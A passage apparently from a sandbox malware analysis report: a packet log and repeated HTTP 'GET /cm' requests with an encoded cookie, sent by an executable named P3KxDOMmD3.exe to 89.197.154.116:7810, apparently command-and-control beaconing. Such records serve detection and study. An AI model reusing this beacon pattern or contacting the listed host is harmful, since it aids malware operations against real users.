Oct 7, 2024 22:03:43.614250898 CEST	50123	7810	192.168.2.4	89.197.154.116
Oct 7, 2024 22:03:43.882054090 CEST	7810	50123	89.197.154.116	192.168.2.4
Oct 7, 2024 22:03:45.472049952 CEST	7810	50123	89.197.154.116	192.168.2.4
Oct 7, 2024 22:03:45.472141027 CEST	50123	7810	192.168.2.4	89.197.154.116
Oct 7, 2024 22:03:45.556164026 CEST	50123	7810	192.168.2.4	89.197.154.116
Oct 7, 2024 22:03:45.671101093 CEST	50124	7810	192.168.2.4	89.197.154.116
Oct 7, 2024 22:03:45.856220007 CEST	50123	7810	192.168.2.4	89.197.154.116
Oct 7, 2024 22:03:45.908447027 CEST	7810	50123	89.197.154.116	192.168.2.4
Oct 7, 2024 22:03:45.908466101 CEST	7810	50124	89.197.154.116	192.168.2.4
Oct 7, 2024 22:03:45.908474922 CEST	7810	50123	89.197.154.116	192.168.2.4
Oct 7, 2024 22:03:45.908550024 CEST	50124	7810	192.168.2.4	89.197.154.116
Oct 7, 2024 22:03:45.908581972 CEST	50123	7810	192.168.2.4	89.197.154.116
Oct 7, 2024 22:03:45.908759117 CEST	50124	7810	192.168.2.4	89.197.154.116
Oct 7, 2024 22:03:45.913804054 CEST	7810	50124	89.197.154.116	192.168.2.4
Oct 7, 2024 22:03:47.489037037 CEST	7810	50124	89.197.154.116	192.168.2.4
Oct 7, 2024 22:03:47.489094019 CEST	50124	7810	192.168.2.4	89.197.154.116
Oct 7, 2024 22:03:47.489178896 CEST	50124	7810	192.168.2.4	89.197.154.116
Oct 7, 2024 22:03:47.593121052 CEST	50125	7810	192.168.2.4	89.197.154.116
Oct 7, 2024 22:03:47.731630087 CEST	7810	50124	89.197.154.116	192.168.2.4
Oct 7, 2024 22:03:47.731683969 CEST	50124	7810	192.168.2.4	89.197.154.116
Oct 7, 2024 22:03:47.732803106 CEST	7810	50124	89.197.154.116	192.168.2.4
Oct 7, 2024 22:03:47.732839108 CEST	7810	50125	89.197.154.116	192.168.2.4
Oct 7, 2024 22:03:47.732929945 CEST	50125	7810	192.168.2.4	89.197.154.116
Oct 7, 2024 22:03:47.733508110 CEST	50125	7810	192.168.2.4	89.197.154.116
Oct 7, 2024 22:03:47.738317013 CEST	7810	50125	89.197.154.116	192.168.2.4
Oct 7, 2024 22:03:49.298619986 CEST	7810	50125	89.197.154.116	192.168.2.4
Oct 7, 2024 22:03:49.298703909 CEST	50125	7810	192.168.2.4	89.197.154.116
Oct 7, 2024 22:03:49.298804045 CEST	50125	7810	192.168.2.4	89.197.154.116
Oct 7, 2024 22:03:49.303956985 CEST	7810	50125	89.197.154.116	192.168.2.4
Oct 7, 2024 22:03:49.406322956 CEST	50126	7810	192.168.2.4	89.197.154.116
Oct 7, 2024 22:03:49.411509991 CEST	7810	50126	89.197.154.116	192.168.2.4
Oct 7, 2024 22:03:49.411587954 CEST	50126	7810	192.168.2.4	89.197.154.116
Oct 7, 2024 22:03:49.411884069 CEST	50126	7810	192.168.2.4	89.197.154.116
Oct 7, 2024 22:03:49.416786909 CEST	7810	50126	89.197.154.116	192.168.2.4
Oct 7, 2024 22:03:51.006023884 CEST	7810	50126	89.197.154.116	192.168.2.4
Oct 7, 2024 22:03:51.006115913 CEST	50126	7810	192.168.2.4	89.197.154.116
Oct 7, 2024 22:03:51.006259918 CEST	50126	7810	192.168.2.4	89.197.154.116
Oct 7, 2024 22:03:51.011276960 CEST	7810	50126	89.197.154.116	192.168.2.4
Oct 7, 2024 22:03:51.240916967 CEST	50127	7810	192.168.2.4	89.197.154.116
Oct 7, 2024 22:03:51.246026039 CEST	7810	50127	89.197.154.116	192.168.2.4
Oct 7, 2024 22:03:51.246093035 CEST	50127	7810	192.168.2.4	89.197.154.116
Oct 7, 2024 22:03:51.247157097 CEST	50127	7810	192.168.2.4	89.197.154.116
Oct 7, 2024 22:03:51.252183914 CEST	7810	50127	89.197.154.116	192.168.2.4
Oct 7, 2024 22:03:52.813980103 CEST	7810	50127	89.197.154.116	192.168.2.4
Oct 7, 2024 22:03:52.816639900 CEST	50127	7810	192.168.2.4	89.197.154.116
Oct 7, 2024 22:03:52.816732883 CEST	50127	7810	192.168.2.4	89.197.154.116
Oct 7, 2024 22:03:52.821682930 CEST	7810	50127	89.197.154.116	192.168.2.4
Oct 7, 2024 22:03:52.923728943 CEST	50128	7810	192.168.2.4	89.197.154.116
Oct 7, 2024 22:03:52.929172039 CEST	7810	50128	89.197.154.116	192.168.2.4
Oct 7, 2024 22:03:52.929367065 CEST	50128	7810	192.168.2.4	89.197.154.116
Oct 7, 2024 22:03:52.929528952 CEST	50128	7810	192.168.2.4	89.197.154.116
Oct 7, 2024 22:03:52.935049057 CEST	7810	50128	89.197.154.116	192.168.2.4
Oct 7, 2024 22:03:54.502327919 CEST	7810	50128	89.197.154.116	192.168.2.4
Oct 7, 2024 22:03:54.507410049 CEST	50128	7810	192.168.2.4	89.197.154.116
Oct 7, 2024 22:03:54.507441044 CEST	50128	7810	192.168.2.4	89.197.154.116
Oct 7, 2024 22:03:54.512794971 CEST	7810	50128	89.197.154.116	192.168.2.4
Oct 7, 2024 22:03:54.610426903 CEST	50129	7810	192.168.2.4	89.197.154.116
Oct 7, 2024 22:03:54.615592957 CEST	7810	50129	89.197.154.116	192.168.2.4
Oct 7, 2024 22:03:54.615715981 CEST	50129	7810	192.168.2.4	89.197.154.116
Oct 7, 2024 22:03:54.615895987 CEST	50129	7810	192.168.2.4	89.197.154.116
Oct 7, 2024 22:03:54.620887995 CEST	7810	50129	89.197.154.116	192.168.2.4
Oct 7, 2024 22:03:56.419128895 CEST	7810	50129	89.197.154.116	192.168.2.4
Oct 7, 2024 22:03:56.419857979 CEST	50129	7810	192.168.2.4	89.197.154.116
Oct 7, 2024 22:03:56.419857979 CEST	50129	7810	192.168.2.4	89.197.154.116
Oct 7, 2024 22:03:56.424715042 CEST	7810	50129	89.197.154.116	192.168.2.4
Oct 7, 2024 22:03:56.531433105 CEST	50130	7810	192.168.2.4	89.197.154.116
Oct 7, 2024 22:03:56.536395073 CEST	7810	50130	89.197.154.116	192.168.2.4
Oct 7, 2024 22:03:56.536534071 CEST	50130	7810	192.168.2.4	89.197.154.116
Oct 7, 2024 22:03:56.536883116 CEST	50130	7810	192.168.2.4	89.197.154.116
Oct 7, 2024 22:03:56.541651964 CEST	7810	50130	89.197.154.116	192.168.2.4
Oct 7, 2024 22:03:58.131736040 CEST	7810	50130	89.197.154.116	192.168.2.4
Oct 7, 2024 22:03:58.135993004 CEST	50130	7810	192.168.2.4	89.197.154.116
Oct 7, 2024 22:03:58.135993004 CEST	50130	7810	192.168.2.4	89.197.154.116
Oct 7, 2024 22:03:58.140861988 CEST	7810	50130	89.197.154.116	192.168.2.4
Oct 7, 2024 22:03:58.249382973 CEST	50131	7810	192.168.2.4	89.197.154.116
Oct 7, 2024 22:03:58.254472017 CEST	7810	50131	89.197.154.116	192.168.2.4
Oct 7, 2024 22:03:58.254662991 CEST	50131	7810	192.168.2.4	89.197.154.116
Oct 7, 2024 22:03:58.254662991 CEST	50131	7810	192.168.2.4	89.197.154.116
Oct 7, 2024 22:03:58.259569883 CEST	7810	50131	89.197.154.116	192.168.2.4
Oct 7, 2024 22:03:59.879194021 CEST	7810	50131	89.197.154.116	192.168.2.4
Oct 7, 2024 22:03:59.879302025 CEST	50131	7810	192.168.2.4	89.197.154.116
Oct 7, 2024 22:03:59.881572962 CEST	50131	7810	192.168.2.4	89.197.154.116
Oct 7, 2024 22:03:59.886670113 CEST	7810	50131	89.197.154.116	192.168.2.4
Oct 7, 2024 22:04:00.025152922 CEST	50132	7810	192.168.2.4	89.197.154.116
Oct 7, 2024 22:04:00.030544996 CEST	7810	50132	89.197.154.116	192.168.2.4
Oct 7, 2024 22:04:00.034363031 CEST	50132	7810	192.168.2.4	89.197.154.116
Oct 7, 2024 22:04:00.034507990 CEST	50132	7810	192.168.2.4	89.197.154.116
Oct 7, 2024 22:04:00.039597034 CEST	7810	50132	89.197.154.116	192.168.2.4
Oct 7, 2024 22:04:01.843373060 CEST	7810	50132	89.197.154.116	192.168.2.4
Oct 7, 2024 22:04:01.843456984 CEST	50132	7810	192.168.2.4	89.197.154.116
Oct 7, 2024 22:04:01.843554020 CEST	50132	7810	192.168.2.4	89.197.154.116
Oct 7, 2024 22:04:01.843628883 CEST	7810	50132	89.197.154.116	192.168.2.4
Oct 7, 2024 22:04:01.843672037 CEST	50132	7810	192.168.2.4	89.197.154.116
Oct 7, 2024 22:04:01.848541021 CEST	7810	50132	89.197.154.116	192.168.2.4
Oct 7, 2024 22:04:01.967870951 CEST	50133	7810	192.168.2.4	89.197.154.116
Oct 7, 2024 22:04:01.973436117 CEST	7810	50133	89.197.154.116	192.168.2.4
Oct 7, 2024 22:04:01.973540068 CEST	50133	7810	192.168.2.4	89.197.154.116
Oct 7, 2024 22:04:01.973644018 CEST	50133	7810	192.168.2.4	89.197.154.116
Oct 7, 2024 22:04:01.978549957 CEST	7810	50133	89.197.154.116	192.168.2.4
Oct 7, 2024 22:04:03.584256887 CEST	7810	50133	89.197.154.116	192.168.2.4
Oct 7, 2024 22:04:03.584335089 CEST	50133	7810	192.168.2.4	89.197.154.116
Oct 7, 2024 22:04:03.584419966 CEST	50133	7810	192.168.2.4	89.197.154.116
Oct 7, 2024 22:04:03.590887070 CEST	7810	50133	89.197.154.116	192.168.2.4
Oct 7, 2024 22:04:03.702655077 CEST	50134	7810	192.168.2.4	89.197.154.116
Oct 7, 2024 22:04:03.707755089 CEST	7810	50134	89.197.154.116	192.168.2.4
Oct 7, 2024 22:04:03.707967043 CEST	50134	7810	192.168.2.4	89.197.154.116
Oct 7, 2024 22:04:03.708085060 CEST	50134	7810	192.168.2.4	89.197.154.116
Oct 7, 2024 22:04:03.713037014 CEST	7810	50134	89.197.154.116	192.168.2.4
Oct 7, 2024 22:04:07.715970039 CEST	50134	7810	192.168.2.4	89.197.154.116
Oct 7, 2024 22:04:07.827104092 CEST	50135	7810	192.168.2.4	89.197.154.116
Oct 7, 2024 22:04:07.832660913 CEST	7810	50135	89.197.154.116	192.168.2.4
Oct 7, 2024 22:04:07.832803011 CEST	50135	7810	192.168.2.4	89.197.154.116
Oct 7, 2024 22:04:07.832915068 CEST	50135	7810	192.168.2.4	89.197.154.116
Oct 7, 2024 22:04:07.838213921 CEST	7810	50135	89.197.154.116	192.168.2.4
Oct 7, 2024 22:04:10.473695993 CEST	7810	50135	89.197.154.116	192.168.2.4
Oct 7, 2024 22:04:10.473795891 CEST	50135	7810	192.168.2.4	89.197.154.116
Oct 7, 2024 22:04:10.473881006 CEST	50135	7810	192.168.2.4	89.197.154.116
Oct 7, 2024 22:04:10.474369049 CEST	7810	50135	89.197.154.116	192.168.2.4
Oct 7, 2024 22:04:10.474430084 CEST	50135	7810	192.168.2.4	89.197.154.116
Oct 7, 2024 22:04:10.475099087 CEST	7810	50135	89.197.154.116	192.168.2.4
Oct 7, 2024 22:04:10.475153923 CEST	50135	7810	192.168.2.4	89.197.154.116
Oct 7, 2024 22:04:10.479134083 CEST	7810	50135	89.197.154.116	192.168.2.4

HTTP Request Dependency Graph

89.197.154.116:7810

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49730	89.197.154.116	7810	5480	C:\Users\user\Desktop\P3KxDOMmD3.exe

Timestamp	Bytes transferred	Direction	Data
Oct 7, 2024 22:00:03.306828022 CEST	383	OUT	GET /cm HTTP/1.1 Accept: / Cookie: p737AJ+Kb4s44Knv3qxwXyZN0sNB5SG8LM5hmOgHosHtGW6oDQp/IbjAuUH45eOonZgEzpRFWkcD7wuVmUTHT+7Nw+f7+0bPCUXiIonUDmGnR6f8QvmPkPqUUiF2v7lf4LpY5nNZsLApD4/d7aRhuV857N9woAbKVUcRkT8ICjQ= User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; BOIE9;ENUSMSE) Host: 89.197.154.116:7810 Connection: Keep-Alive Cache-Control: no-cache

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49731	89.197.154.116	7810	5480	C:\Users\user\Desktop\P3KxDOMmD3.exe

Timestamp	Bytes transferred	Direction	Data
Oct 7, 2024 22:00:05.236342907 CEST	383	OUT	GET /cm HTTP/1.1 Accept: / Cookie: p737AJ+Kb4s44Knv3qxwXyZN0sNB5SG8LM5hmOgHosHtGW6oDQp/IbjAuUH45eOonZgEzpRFWkcD7wuVmUTHT+7Nw+f7+0bPCUXiIonUDmGnR6f8QvmPkPqUUiF2v7lf4LpY5nNZsLApD4/d7aRhuV857N9woAbKVUcRkT8ICjQ= User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; BOIE9;ENUSMSE) Host: 89.197.154.116:7810 Connection: Keep-Alive Cache-Control: no-cache

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	49732	89.197.154.116	7810	5480	C:\Users\user\Desktop\P3KxDOMmD3.exe

Timestamp	Bytes transferred	Direction	Data
Oct 7, 2024 22:00:06.940051079 CEST	383	OUT	GET /cm HTTP/1.1 Accept: / Cookie: p737AJ+Kb4s44Knv3qxwXyZN0sNB5SG8LM5hmOgHosHtGW6oDQp/IbjAuUH45eOonZgEzpRFWkcD7wuVmUTHT+7Nw+f7+0bPCUXiIonUDmGnR6f8QvmPkPqUUiF2v7lf4LpY5nNZsLApD4/d7aRhuV857N9woAbKVUcRkT8ICjQ= User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; BOIE9;ENUSMSE) Host: 89.197.154.116:7810 Connection: Keep-Alive Cache-Control: no-cache

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.4	49733	89.197.154.116	7810	5480	C:\Users\user\Desktop\P3KxDOMmD3.exe

Timestamp	Bytes transferred	Direction	Data
Oct 7, 2024 22:00:08.646265030 CEST	383	OUT	GET /cm HTTP/1.1 Accept: / Cookie: p737AJ+Kb4s44Knv3qxwXyZN0sNB5SG8LM5hmOgHosHtGW6oDQp/IbjAuUH45eOonZgEzpRFWkcD7wuVmUTHT+7Nw+f7+0bPCUXiIonUDmGnR6f8QvmPkPqUUiF2v7lf4LpY5nNZsLApD4/d7aRhuV857N9woAbKVUcRkT8ICjQ= User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; BOIE9;ENUSMSE) Host: 89.197.154.116:7810 Connection: Keep-Alive Cache-Control: no-cache

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.4	49734	89.197.154.116	7810	5480	C:\Users\user\Desktop\P3KxDOMmD3.exe

Timestamp	Bytes transferred	Direction	Data
Oct 7, 2024 22:00:10.452492952 CEST	383	OUT	GET /cm HTTP/1.1 Accept: / Cookie: p737AJ+Kb4s44Knv3qxwXyZN0sNB5SG8LM5hmOgHosHtGW6oDQp/IbjAuUH45eOonZgEzpRFWkcD7wuVmUTHT+7Nw+f7+0bPCUXiIonUDmGnR6f8QvmPkPqUUiF2v7lf4LpY5nNZsLApD4/d7aRhuV857N9woAbKVUcRkT8ICjQ= User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; BOIE9;ENUSMSE) Host: 89.197.154.116:7810 Connection: Keep-Alive Cache-Control: no-cache

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.4	49735	89.197.154.116	7810	5480	C:\Users\user\Desktop\P3KxDOMmD3.exe

Timestamp	Bytes transferred	Direction	Data
Oct 7, 2024 22:00:12.143825054 CEST	383	OUT	GET /cm HTTP/1.1 Accept: / Cookie: p737AJ+Kb4s44Knv3qxwXyZN0sNB5SG8LM5hmOgHosHtGW6oDQp/IbjAuUH45eOonZgEzpRFWkcD7wuVmUTHT+7Nw+f7+0bPCUXiIonUDmGnR6f8QvmPkPqUUiF2v7lf4LpY5nNZsLApD4/d7aRhuV857N9woAbKVUcRkT8ICjQ= User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; BOIE9;ENUSMSE) Host: 89.197.154.116:7810 Connection: Keep-Alive Cache-Control: no-cache

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.4	49736	89.197.154.116	7810	5480	C:\Users\user\Desktop\P3KxDOMmD3.exe

Timestamp	Bytes transferred	Direction	Data
Oct 7, 2024 22:00:13.972333908 CEST	383	OUT	GET /cm HTTP/1.1 Accept: / Cookie: p737AJ+Kb4s44Knv3qxwXyZN0sNB5SG8LM5hmOgHosHtGW6oDQp/IbjAuUH45eOonZgEzpRFWkcD7wuVmUTHT+7Nw+f7+0bPCUXiIonUDmGnR6f8QvmPkPqUUiF2v7lf4LpY5nNZsLApD4/d7aRhuV857N9woAbKVUcRkT8ICjQ= User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; BOIE9;ENUSMSE) Host: 89.197.154.116:7810 Connection: Keep-Alive Cache-Control: no-cache

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.4	49737	89.197.154.116	7810	5480	C:\Users\user\Desktop\P3KxDOMmD3.exe

Timestamp	Bytes transferred	Direction	Data
Oct 7, 2024 22:00:15.702023983 CEST	383	OUT	GET /cm HTTP/1.1 Accept: / Cookie: p737AJ+Kb4s44Knv3qxwXyZN0sNB5SG8LM5hmOgHosHtGW6oDQp/IbjAuUH45eOonZgEzpRFWkcD7wuVmUTHT+7Nw+f7+0bPCUXiIonUDmGnR6f8QvmPkPqUUiF2v7lf4LpY5nNZsLApD4/d7aRhuV857N9woAbKVUcRkT8ICjQ= User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; BOIE9;ENUSMSE) Host: 89.197.154.116:7810 Connection: Keep-Alive Cache-Control: no-cache

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.4	49738	89.197.154.116	7810	5480	C:\Users\user\Desktop\P3KxDOMmD3.exe

Timestamp	Bytes transferred	Direction	Data
Oct 7, 2024 22:00:17.426239967 CEST	383	OUT	GET /cm HTTP/1.1 Accept: / Cookie: p737AJ+Kb4s44Knv3qxwXyZN0sNB5SG8LM5hmOgHosHtGW6oDQp/IbjAuUH45eOonZgEzpRFWkcD7wuVmUTHT+7Nw+f7+0bPCUXiIonUDmGnR6f8QvmPkPqUUiF2v7lf4LpY5nNZsLApD4/d7aRhuV857N9woAbKVUcRkT8ICjQ= User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; BOIE9;ENUSMSE) Host: 89.197.154.116:7810 Connection: Keep-Alive Cache-Control: no-cache

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.4	49741	89.197.154.116	7810	5480	C:\Users\user\Desktop\P3KxDOMmD3.exe

Timestamp	Bytes transferred	Direction	Data
Oct 7, 2024 22:00:19.145735979 CEST	383	OUT	GET /cm HTTP/1.1 Accept: / Cookie: p737AJ+Kb4s44Knv3qxwXyZN0sNB5SG8LM5hmOgHosHtGW6oDQp/IbjAuUH45eOonZgEzpRFWkcD7wuVmUTHT+7Nw+f7+0bPCUXiIonUDmGnR6f8QvmPkPqUUiF2v7lf4LpY5nNZsLApD4/d7aRhuV857N9woAbKVUcRkT8ICjQ= User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; BOIE9;ENUSMSE) Host: 89.197.154.116:7810 Connection: Keep-Alive Cache-Control: no-cache

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.4	49745	89.197.154.116	7810	5480	C:\Users\user\Desktop\P3KxDOMmD3.exe

Timestamp	Bytes transferred	Direction	Data
Oct 7, 2024 22:00:20.849200010 CEST	383	OUT	GET /cm HTTP/1.1 Accept: / Cookie: p737AJ+Kb4s44Knv3qxwXyZN0sNB5SG8LM5hmOgHosHtGW6oDQp/IbjAuUH45eOonZgEzpRFWkcD7wuVmUTHT+7Nw+f7+0bPCUXiIonUDmGnR6f8QvmPkPqUUiF2v7lf4LpY5nNZsLApD4/d7aRhuV857N9woAbKVUcRkT8ICjQ= User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; BOIE9;ENUSMSE) Host: 89.197.154.116:7810 Connection: Keep-Alive Cache-Control: no-cache

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.4	49747	89.197.154.116	7810	5480	C:\Users\user\Desktop\P3KxDOMmD3.exe

Timestamp	Bytes transferred	Direction	Data
Oct 7, 2024 22:00:22.724162102 CEST	383	OUT	GET /cm HTTP/1.1 Accept: / Cookie: p737AJ+Kb4s44Knv3qxwXyZN0sNB5SG8LM5hmOgHosHtGW6oDQp/IbjAuUH45eOonZgEzpRFWkcD7wuVmUTHT+7Nw+f7+0bPCUXiIonUDmGnR6f8QvmPkPqUUiF2v7lf4LpY5nNZsLApD4/d7aRhuV857N9woAbKVUcRkT8ICjQ= User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; BOIE9;ENUSMSE) Host: 89.197.154.116:7810 Connection: Keep-Alive Cache-Control: no-cache

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.4	49748	89.197.154.116	7810	5480	C:\Users\user\Desktop\P3KxDOMmD3.exe

Timestamp	Bytes transferred	Direction	Data
Oct 7, 2024 22:00:24.410253048 CEST	383	OUT	GET /cm HTTP/1.1 Accept: / Cookie: p737AJ+Kb4s44Knv3qxwXyZN0sNB5SG8LM5hmOgHosHtGW6oDQp/IbjAuUH45eOonZgEzpRFWkcD7wuVmUTHT+7Nw+f7+0bPCUXiIonUDmGnR6f8QvmPkPqUUiF2v7lf4LpY5nNZsLApD4/d7aRhuV857N9woAbKVUcRkT8ICjQ= User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; BOIE9;ENUSMSE) Host: 89.197.154.116:7810 Connection: Keep-Alive Cache-Control: no-cache

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.4	49749	89.197.154.116	7810	5480	C:\Users\user\Desktop\P3KxDOMmD3.exe

Timestamp	Bytes transferred	Direction	Data
Oct 7, 2024 22:00:26.127382994 CEST	383	OUT	GET /cm HTTP/1.1 Accept: / Cookie: p737AJ+Kb4s44Knv3qxwXyZN0sNB5SG8LM5hmOgHosHtGW6oDQp/IbjAuUH45eOonZgEzpRFWkcD7wuVmUTHT+7Nw+f7+0bPCUXiIonUDmGnR6f8QvmPkPqUUiF2v7lf4LpY5nNZsLApD4/d7aRhuV857N9woAbKVUcRkT8ICjQ= User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; BOIE9;ENUSMSE) Host: 89.197.154.116:7810 Connection: Keep-Alive Cache-Control: no-cache

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.4	49750	89.197.154.116	7810	5480	C:\Users\user\Desktop\P3KxDOMmD3.exe

Timestamp	Bytes transferred	Direction	Data
Oct 7, 2024 22:00:27.877765894 CEST	383	OUT	GET /cm HTTP/1.1 Accept: / Cookie: p737AJ+Kb4s44Knv3qxwXyZN0sNB5SG8LM5hmOgHosHtGW6oDQp/IbjAuUH45eOonZgEzpRFWkcD7wuVmUTHT+7Nw+f7+0bPCUXiIonUDmGnR6f8QvmPkPqUUiF2v7lf4LpY5nNZsLApD4/d7aRhuV857N9woAbKVUcRkT8ICjQ= User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; BOIE9;ENUSMSE) Host: 89.197.154.116:7810 Connection: Keep-Alive Cache-Control: no-cache

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.4	49751	89.197.154.116	7810	5480	C:\Users\user\Desktop\P3KxDOMmD3.exe

Timestamp	Bytes transferred	Direction	Data
Oct 7, 2024 22:00:29.566318035 CEST	383	OUT	GET /cm HTTP/1.1 Accept: / Cookie: p737AJ+Kb4s44Knv3qxwXyZN0sNB5SG8LM5hmOgHosHtGW6oDQp/IbjAuUH45eOonZgEzpRFWkcD7wuVmUTHT+7Nw+f7+0bPCUXiIonUDmGnR6f8QvmPkPqUUiF2v7lf4LpY5nNZsLApD4/d7aRhuV857N9woAbKVUcRkT8ICjQ= User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; BOIE9;ENUSMSE) Host: 89.197.154.116:7810 Connection: Keep-Alive Cache-Control: no-cache

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
16	192.168.2.4	49752	89.197.154.116	7810	5480	C:\Users\user\Desktop\P3KxDOMmD3.exe

Timestamp	Bytes transferred	Direction	Data
Oct 7, 2024 22:00:33.967817068 CEST	383	OUT	GET /cm HTTP/1.1 Accept: / Cookie: p737AJ+Kb4s44Knv3qxwXyZN0sNB5SG8LM5hmOgHosHtGW6oDQp/IbjAuUH45eOonZgEzpRFWkcD7wuVmUTHT+7Nw+f7+0bPCUXiIonUDmGnR6f8QvmPkPqUUiF2v7lf4LpY5nNZsLApD4/d7aRhuV857N9woAbKVUcRkT8ICjQ= User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; BOIE9;ENUSMSE) Host: 89.197.154.116:7810 Connection: Keep-Alive Cache-Control: no-cache

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
17	192.168.2.4	49753	89.197.154.116	7810	5480	C:\Users\user\Desktop\P3KxDOMmD3.exe

Timestamp	Bytes transferred	Direction	Data
Oct 7, 2024 22:00:35.659131050 CEST	383	OUT	GET /cm HTTP/1.1 Accept: / Cookie: p737AJ+Kb4s44Knv3qxwXyZN0sNB5SG8LM5hmOgHosHtGW6oDQp/IbjAuUH45eOonZgEzpRFWkcD7wuVmUTHT+7Nw+f7+0bPCUXiIonUDmGnR6f8QvmPkPqUUiF2v7lf4LpY5nNZsLApD4/d7aRhuV857N9woAbKVUcRkT8ICjQ= User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; BOIE9;ENUSMSE) Host: 89.197.154.116:7810 Connection: Keep-Alive Cache-Control: no-cache

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
18	192.168.2.4	49754	89.197.154.116	7810	5480	C:\Users\user\Desktop\P3KxDOMmD3.exe

Timestamp	Bytes transferred	Direction	Data
Oct 7, 2024 22:00:37.382189035 CEST	383	OUT	GET /cm HTTP/1.1 Accept: / Cookie: p737AJ+Kb4s44Knv3qxwXyZN0sNB5SG8LM5hmOgHosHtGW6oDQp/IbjAuUH45eOonZgEzpRFWkcD7wuVmUTHT+7Nw+f7+0bPCUXiIonUDmGnR6f8QvmPkPqUUiF2v7lf4LpY5nNZsLApD4/d7aRhuV857N9woAbKVUcRkT8ICjQ= User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; BOIE9;ENUSMSE) Host: 89.197.154.116:7810 Connection: Keep-Alive Cache-Control: no-cache

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
19	192.168.2.4	49755	89.197.154.116	7810	5480	C:\Users\user\Desktop\P3KxDOMmD3.exe

Timestamp	Bytes transferred	Direction	Data
Oct 7, 2024 22:00:39.081021070 CEST	383	OUT	GET /cm HTTP/1.1 Accept: / Cookie: p737AJ+Kb4s44Knv3qxwXyZN0sNB5SG8LM5hmOgHosHtGW6oDQp/IbjAuUH45eOonZgEzpRFWkcD7wuVmUTHT+7Nw+f7+0bPCUXiIonUDmGnR6f8QvmPkPqUUiF2v7lf4LpY5nNZsLApD4/d7aRhuV857N9woAbKVUcRkT8ICjQ= User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; BOIE9;ENUSMSE) Host: 89.197.154.116:7810 Connection: Keep-Alive Cache-Control: no-cache

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
20	192.168.2.4	49756	89.197.154.116	7810	5480	C:\Users\user\Desktop\P3KxDOMmD3.exe

Timestamp	Bytes transferred	Direction	Data
Oct 7, 2024 22:00:40.785969973 CEST	383	OUT	GET /cm HTTP/1.1 Accept: / Cookie: p737AJ+Kb4s44Knv3qxwXyZN0sNB5SG8LM5hmOgHosHtGW6oDQp/IbjAuUH45eOonZgEzpRFWkcD7wuVmUTHT+7Nw+f7+0bPCUXiIonUDmGnR6f8QvmPkPqUUiF2v7lf4LpY5nNZsLApD4/d7aRhuV857N9woAbKVUcRkT8ICjQ= User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; BOIE9;ENUSMSE) Host: 89.197.154.116:7810 Connection: Keep-Alive Cache-Control: no-cache

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
21	192.168.2.4	49757	89.197.154.116	7810	5480	C:\Users\user\Desktop\P3KxDOMmD3.exe

Timestamp	Bytes transferred	Direction	Data
